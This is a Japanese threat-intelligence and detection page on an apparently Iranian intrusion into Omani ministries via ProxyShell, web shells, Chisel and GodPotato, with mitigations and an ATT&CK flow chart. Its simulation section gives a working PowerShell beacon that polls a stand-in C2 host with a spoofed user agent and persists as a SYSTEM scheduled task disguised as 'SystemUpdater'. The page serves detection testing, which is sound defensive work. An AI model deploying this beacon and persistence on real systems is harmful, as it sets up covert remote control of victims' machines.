フォローする 
概要
国家に関連したイランの脅威アクターが、ウェブシェル、ProxyShellの脆弱性を利用した攻撃、およびUAEに基づくVPS上にホストされたカスタムコマンド・アンド・コントロール環境を使用して、オマーンの複数の政府省庁に対する攻撃を行いました。攻撃者は26,000以上のユーザ記録とレジストリのハイブを流出させた後、ChiselやGodPotatoを含む後の侵害攻撃ツールを展開してアクセスを深めました。この作戦は、攻撃者のツール、スクリプト、およびC2ログを意図せずに明らかにするオープンディレクトリによってさらに露出しました。それにより、侵入の全ライフサイクルが可視化されました。
調査
研究者は以下の公開されたVPSにアクセスしました 172.86.76.127 そして、ウェブシェル、Pythonベースのコマンド・アンド・コントロールスクリプト、特権昇格ツール、ProxyShellおよびDNN SSRF脆弱性を狙う複数のエクスプロイトスクリプトを特定しました。ネットワークログにはポート 8001 and 8002でのビーコニング活動が示されており、秘密裏にアクセスするためにChiselトンネルも使用されていました。調査では、スケジュールされたタスクの作成、レジストリハイブの抽出、侵害されたシステムからの大規模なデータダンピングも文書化されました。
緩和策
組織は、Microsoft Exchangeに関連するProxyShellのすべてのパッチを適用し、 CVE-2025-32372として追跡されるDNN SSRF問題を修正するべきです。Webアプリケーションは強化され、IISアカウントは最小特権で実行されるべきであり、未使用の ASP.NET ページは可能な限り無効にするべきです。防御者はまた、Webアプリケーションファイアウォールを配備し、異常なポートでのアウトバウンドトラフィックを監視し、インターネットに接続されているサーバーを定期的に点検して、放置されたり公開されたディレクトリを確認するべきです。
対応
セキュリティチームはウェブシェルアクセスパターン、PowerShellビーコニングの動作、Chiselトンネル活動、および疑わしいスケジュールタスクの作成を検出するための検出を行うべきです。インシデント対応者はウェブサーバーログ、レジストリハイブ、および法医学分析のためのデータベースダンプを収集するべきです。影響を受けたシステムは隔離され、資格情報は回転され、オマーンの関連当局または関係者に遅滞なく通知されるべきです。
"graph TB %% Class Definitions Section classDef technique fill:#c2e0ff classDef tool fill:#cccccc %% Node Definitions u2013 Techniques initial_access["<b>Technique</b> – <b>T1190 Exploit Public-Facing Application</b><br/>Method: ProxyShell & DNN SSRF"] class initial_access technique remote_services["<b>Technique</b> – <b>T1210 Exploitation of Remote Services</b><br/>Lateral movement"] class remote_services technique web_shell["<b>Technique</b> – <b>T1505.003 Web Shell</b><br/>Deployed: hc2.aspx / health_check_t.aspx"] class web_shell technique c2_bidir["<b>Technique</b> – <b>T1102.002 Web Service Bidirectional Communication</b><br/>HTTP C2 server"] class c2_bidir technique tunneling["<b>Technique</b> – <b>T1572 Protocol Tunneling</b> & <b>T1219.001 IDE Tunneling</b><br/>Tool: Chisel"] class tunneling technique weaken_enc["<b>Technique</b> – <b>T1600 Weaken Encryption</b><br/>Applied to tunnel"] class weaken_enc technique priv_esc["<b>Technique</b> – <b>T1134.003 Access Token Manipulation</b> & <b>T1068 Exploitation for Privilege Escalation</b><br/>Tool: GodPotato"] class priv_esc technique account_manip["<b>Technique</b> – <b>T1098 Account Manipulation</b><br/>Maintain elevated rights"] class account_manip technique cred_access["<b>Technique</b> – <b>T1012 Query Registry</b><br/>Steal SAM/System hives"] class cred_access technique def_evasion["<b>Technique</b> – <b>T1562 Impair Defenses</b> & <b>T1668 Exclusive Control</b><br/>Disable AV"] class def_evasion technique discovery["<b>Technique</b> – <b>T1592.002 Gather Victim Host Info</b> & <b>T1590.001 Network Domain Properties</b>"] class discovery technique exfiltration["<b>Technique</b> – <b>T1041 Exfiltration Over C2 Channel</b> & <b>T1030 Data Transfer Size Limits</b>"] class exfiltration technique oneway["<b>Technique</b> – <b>T1102.003 One-Way Web Service Communication</b><br/>Result posting"] class oneway technique %% Node Definitions u2013 Tools / Malware tool_proxyshell["<b>Tool</b> – <b>Name</b>: ProxyShell<br/><b>Purpose</b>: Exploit Exchange Server"] class tool_proxyshell tool tool_chisel["<b>Tool</b> – <b>Name</b>: Chisel<br/><b>Purpose</b>: Tunneling"] class tool_chisel tool tool_godpotato["<b>Tool</b> – <b>Name</b>: GodPotato<br/><b>Purpose</b>: Privilege escalation"] class tool_godpotato tool %% Connections u2013 Attack Flow initial_access –>|leads_to| remote_services initial_access –>|uses| tool_proxyshell remote_services –>|leads_to| web_shell web_shell –>|enables| c2_bidir c2_bidir –>|uses| tunneling tunneling –>|uses| tool_chisel tunneling –>|enables| weaken_enc weaken_enc –>|enables| priv_esc priv_esc –>|uses| tool_godpotato priv_esc –>|enables| account_manip account_manip –>|enables| cred_access cred_access –>|enables| def_evasion def_evasion –>|enables| discovery discovery –>|enables| exfiltration exfiltration –>|uses| oneway "
攻撃フロー
検出
隠されたPowerShellコマンドラインでの実行の可能性 (cmdline経由)
表示
PowerShell経由でのダウンロードまたはアップロード (cmdline経由)
表示
アカウントまたはグループの列挙/操作の可能性 (cmdline経由)
表示
LOLBAS Schtasks (cmdline経由)
表示
検出されるIOC(HashSha256):イランのネットワークによるオマーン政府への攻撃:12省庁が被害を受け、26,000名の市民記録が露出
表示
検出されるIOC(SourceIP):イランのネットワークによるオマーン政府への攻撃:12省庁が被害を受け、26,000名の市民記録が露出
表示
検出されるIOC(DestinationIP):イランのネットワークによるオマーン政府への攻撃:12省庁が被害を受け、26,000名の市民記録が露出
表示
hc2.aspxおよびhealth_check_t.aspxウェブシェルとProxyShellエクスプロイトの検出 [Webサーバー]
表示
PowerShellコマンドのポーリングおよび偽装されたChromeユーザーエージェントを介したデータ流出の検出 [Windows Powershell]
表示
シミュレーション実行
前提条件:テレメトリおよびベースラインの事前チェックが合格していること。
理由:このセクションは、検出ルールをトリガーするために設計された攻撃者手法(TTP)の正確な実行を詳細に説明します。コマンドと説明は、特定されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目的としています。抽象的な例や無関連な例は誤診を引き起こします。
-
攻撃の解説とコマンド:
攻撃者は既に被害者のマシンへの足場を得ており、低ノイズのC2ビーコンを確立しようとしています。彼らはPowerShellスクリプト new_beacon.ps1 をユーザーのAppDataフォルダにドロップします。このスクリプトは無限ループで動作し、30秒ごとにリモートC2をポーリングします。各HTTPリクエストはChromeのUA文字列で作成され、通常のウェブトラフィックに溶け込み、ネットワークベースの検出を回避します(T1217、T1674)。攻撃者は、定期的なタスクを用いてビーコンを開始し、持続性を確保します(T1204.004)。 -
回帰テストスクリプト:
# ------------------------------------------------- # 新しいビーコンPowerShellビーコンをデプロイして開始する # ------------------------------------------------- $beaconPath = "$env:APPDATAnew_beacon.ps1" $c2Url = "http://malicious.example.com/beacon" # 1. ビーコンスクリプトを書き込む(シミュレートされた軽量バージョン) $scriptContent = @' while ($true) { $headers = @{ "User-Agent" = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36" } try { Invoke-WebRequest -Uri "$using:c2Url" -Headers $headers -Method GET -TimeoutSec 10 | Out-Null } catch {} Start-Sleep -Seconds 30 } '@ Set-Content -Path $beaconPath -Value $scriptContent -Encoding UTF8 # 2. 持続性のためのスケジュールされたタスクを登録する(毎分実行) $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoProfile -ExecutionPolicy Bypass -File `"$beaconPath`"" $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration ([TimeSpan]::MaxValue) $principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest Register-ScheduledTask -TaskName "SystemUpdater" -Action $action -Trigger $trigger -Principal $principal -Force Write-Host "ビーコンがデプロイされ、スケジュールされたタスクが作成されました。" -
クリーンアップコマンド:
# ------------------------------------------------- # ビーコンとスケジュールされたタスクを削除する # ------------------------------------------------- $beaconPath = "$env:APPDATAnew_beacon.ps1" Unregister-ScheduledTask -TaskName "SystemUpdater" -Confirm:$false Remove-Item -Path $beaconPath -Force -ErrorAction SilentlyContinue Write-Host "クリーンアップが完了しました。"